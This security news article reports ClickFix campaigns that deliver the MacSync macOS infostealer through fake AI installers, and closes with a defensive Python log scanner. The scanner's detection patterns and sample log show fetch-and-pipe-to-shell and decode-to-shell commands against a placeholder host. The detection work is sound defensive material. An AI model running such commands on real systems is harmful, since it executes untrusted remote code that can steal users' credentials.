ClickFix Lures Deliver MacSync macOS Infostealer via Fake AI Installers

Sophos researchers have uncovered three ClickFix campaigns that deliver a macOS information stealer called MacSync by tricking users into running Terminal commands copied from fake installers and search results. Sophos said the lure focuses on convincing users to paste and execute opaque commands rather than exploiting software vulnerabilities.

According to Sophos, the campaigns appeared in three waves: a November 2025 campaign that used sponsored Google search results pointing to a bogus Google Sites page, a December 2025 malvertising effort that hid behind shared ChatGPT conversations, and a February 2026 push targeting Belgium, India, and parts of the Americas that deployed a new MacSync variant with dynamic AppleScript and in-memory execution techniques.

Sophos noted that the install flow is simple: a user clicks a download button, follows instructions to open Terminal and paste a provided command, and that command fetches a shell script that prompts for the system password and runs the stealer. Sophos warned that the social engineering itself is the part most likely to change: “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future,” Sophos said.

Jamf Threat Labs had flagged ClickFix lures as far back as December 2025, and Microsoft Defender Experts reported similar macOS infostealer activity using copy-paste Terminal prompts and fake installers. Microsoft Defender Experts said attackers are using AppleScript automation, fileless execution, and native macOS utilities to harvest credentials, keychains, and wallet seed phrases.

MacSync is designed to contact hard-coded servers to retrieve an AppleScript payload, quietly collect data such as browser credentials, files, keychain databases, and crypto wallet seed phrases, then attempt to remove traces. Sophos said the February variant added in-memory execution to evade static detectors and complicate incident response.

The campaigns rely heavily on trusted platforms and malvertising. Sophos and Microsoft observed fake landing pages hosted on Cloudflare Pages, Squarespace, and other legitimate hosting services, with ads or sponsored search links steering victims to the trojanized instructions. Rapid7 reported a related trend where compromised WordPress sites impersonate a human verification prompt to push ClickFix implants on visitors. “The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said.

Other security teams warn the technique scales because developers commonly use curl piped into sh to install legitimate tools. Pillar Security researcher Eilon Cohen said, “The reason is clear: AI and vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials.” Push Security added context on the social engineering: “The pretext is simply the user wanting to install legit software.”

Threat actors, including traffic distribution system (TDS) operators, are reusing ClickFix and the related InstallFix approach to push a range of stealers and backdoors on both Windows and macOS, Trend Micro and other vendors reported. Rapid7 and Microsoft recommended standard mitigations such as keeping site and plugin software up to date, enabling two-factor authentication for admin accounts, educating users about copy-paste Terminal prompts, monitoring suspicious Terminal activity, and blocking access to known malicious domains.

For users: avoid pasting commands from untrusted sites, do not run unsigned DMGs or unverified installers, and use reputable endpoint protection and browser protections. For administrators: apply updates, harden web platforms, and scan for injected scripts or unauthorized admin accounts, Rapid7 and Microsoft advised.
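As an added example (not code from Sophos, Microsoft or Rapid7), one way to act on the "monitor suspicious Terminal activity" advice above: a small scorer over process-execution events that flags the paste-into-Terminal pattern these campaigns rely on (a remote script piped into a shell, an inline osascript call, a payload decoded on the spot) and weights it higher when the parent process is an interactive Terminal. The log format, host name and base64 blob are constructed for this example and are not real indicators.

```python
import re

# Remote content handed straight to an interpreter: curl ... | sh, or sh -c "$(curl ...)"
FETCH_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(sh|bash|zsh)\b"
    r"|\b(sh|bash|zsh)\s+-c\s+[\"']?\$\((curl|wget)\b")
# AppleScript run inline from the command line
INLINE_APPLESCRIPT = re.compile(r"\bosascript\b.*\s-e\s")
# A payload decoded on the spot: base64 -d/-D/--decode, or a long literal blob piped onward
DECODED_BLOB = re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b|\becho\s+\S{40,}\s*\|")
TERMINAL_PARENTS = {"Terminal", "iTerm2"}  # interactive shells a victim is told to paste into

RULES = [
    (FETCH_TO_SHELL, 3, "remote script piped to shell"),
    (INLINE_APPLESCRIPT, 2, "inline osascript"),
    (DECODED_BLOB, 2, "decoded payload"),
]

def score_cmdline(cmdline: str, parent: str) -> tuple:
    """Weighted indicators; a Terminal parent only adds weight once another rule fired."""
    score, reasons = 0, []
    for pattern, weight, label in RULES:
        if pattern.search(cmdline):
            score += weight
            reasons.append(label)
    if reasons and parent in TERMINAL_PARENTS:
        score += 1
        reasons.append(f"launched from {parent}")
    return score, reasons

def scan(log_text: str, threshold: int = 3) -> list:
    """Constructed log format, one process event per line: ts|user|parent_process|cmdline."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        _ts, _user, parent, cmdline = line.split("|", 3)  # cmdline may itself contain pipes
        score, reasons = score_cmdline(cmdline, parent)
        if score >= threshold:
            findings.append({"line": n, "score": score, "cmdline": cmdline, "reasons": reasons})
    return findings

# Constructed sample events; the host and blob are placeholders, not real indicators.
SAMPLE_LOG = """\
2026-02-10T09:01:02Z|alice|Terminal|ls -la ~/Downloads
2026-02-10T09:02:15Z|alice|Terminal|curl -fsSL https://example.invalid/install.sh | sh
2026-02-10T09:02:16Z|alice|sh|osascript -e 'do shell script "id"'
2026-02-10T09:05:40Z|bob|Terminal|echo aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgYmxvYg== | base64 -D | sh
2026-02-10T09:07:00Z|carol|Terminal|brew install jq
"""
```

Running `scan(SAMPLE_LOG)` reports lines 2 and 4; the lone `osascript -e` on line 3 scores below the threshold because its parent is a script, not an interactive Terminal, which keeps routine automation from being flagged on its own.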

For more detailed advice, see Cybersecurity Waala’s guide on how to protect yourself from cyber attacks.

#macOS #infostealer #ClickFix #cybersecurity #malvertising